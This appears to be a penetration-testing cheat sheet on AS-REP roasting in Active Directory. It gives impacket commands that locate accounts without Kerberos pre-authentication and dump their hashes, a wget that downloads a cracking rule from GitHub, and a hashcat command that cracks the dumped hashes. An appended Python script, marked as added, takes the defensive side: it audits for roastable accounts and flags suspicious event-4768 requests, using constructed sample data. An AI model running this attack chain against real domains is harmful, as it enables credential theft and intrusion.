AS-REP Roasting

Locate AS-REP Roastable Users (NTLM)

impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER

Collect AS-REP Tickets

impacket-GetNPUsers $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER -format hashcat -outputfile asrep.hash

Crack Ticket

wget https://github.com/stealthsploit/OneRuleToRuleThemStill/raw/refs/heads/main/OneRuleToRuleThemStill.rule
hashcat -m 18200 -a 0 asrep.hash rockyou.txt -r OneRuleToRuleThemStill.rule

The above is more of a PoC showing how to crack the hash. However, I'd STRONGLY recommend using something powerful to crack this hash, as the above will take a long time. If you have a powerful GPU, take a look at NPK or VPK.
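
The same exposure seen from the defender's side, as an added example that is not part of the original page: it decodes the userAccountControl bit that makes an account AS-REP roastable and flags Windows Security event 4768 records where a TGT was issued without pre-authentication. The account names, IP addresses, event records and the threshold of two accounts per source are constructed assumptions.

```python
# Added example: defensive audit for AS-REP roastable accounts and requests.
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"
ETYPE_RC4_HMAC = 0x17               # etype 23, the type hashcat mode 18200 handles

def roastable_accounts(accounts):
    """Return enabled accounts whose userAccountControl disables pre-auth."""
    return sorted(name for name, uac in accounts.items()
                  if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE)

def suspicious_tgt_requests(events, threshold=2):
    """Group successful 4768 events with PreAuthType 0 by source address and
    return sources that requested TGTs for `threshold` or more accounts."""
    by_source = {}
    for ev in events:
        if ev["EventID"] != 4768 or ev["Status"] != "0x0" or int(ev["PreAuthType"]) != 0:
            continue
        entry = by_source.setdefault(ev["IpAddress"], {"users": set(), "rc4": False})
        entry["users"].add(ev["TargetUserName"].lower())
        if int(ev["TicketEncryptionType"], 16) == ETYPE_RC4_HMAC:
            entry["rc4"] = True  # RC4 replies are the cheapest to crack offline
    return {ip: {"users": sorted(e["users"]), "rc4": e["rc4"]}
            for ip, e in by_source.items() if len(e["users"]) >= threshold}

def _ev(ip, user, preauth, etype):
    """Build a constructed 4768 record using the event's own field names."""
    return {"EventID": 4768, "Status": "0x0", "IpAddress": ip,
            "TargetUserName": user, "PreAuthType": preauth,
            "TicketEncryptionType": etype}

# Constructed sample data (assumptions, not taken from the page).
SAMPLE_ACCOUNTS = {
    "alice": 0x200,                        # normal account, pre-auth required
    "svc_backup": 0x200 | 0x400000,        # pre-auth disabled
    "svc_print": 0x10200 | 0x400000,       # pre-auth disabled, password never expires
    "old_admin": 0x200 | 0x400000 | 0x2,   # pre-auth disabled, account disabled
}
SAMPLE_EVENTS = [
    _ev("::ffff:10.0.5.23", "svc_backup", "0", "0x17"),
    _ev("::ffff:10.0.5.23", "svc_print", "0", "0x17"),
    _ev("::ffff:10.0.9.4", "alice", "2", "0x12"),        # normal pre-auth logon
    _ev("::ffff:10.0.7.11", "svc_backup", "0", "0x12"),  # single account, below threshold
]

if __name__ == "__main__":
    print("Accounts to fix:", roastable_accounts(SAMPLE_ACCOUNTS))
    print("Sources to review:", suspicious_tgt_requests(SAMPLE_EVENTS))
```

Re-enabling pre-authentication on every account the first function returns closes the exposure; where that is not possible, those accounts need long random passwords.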
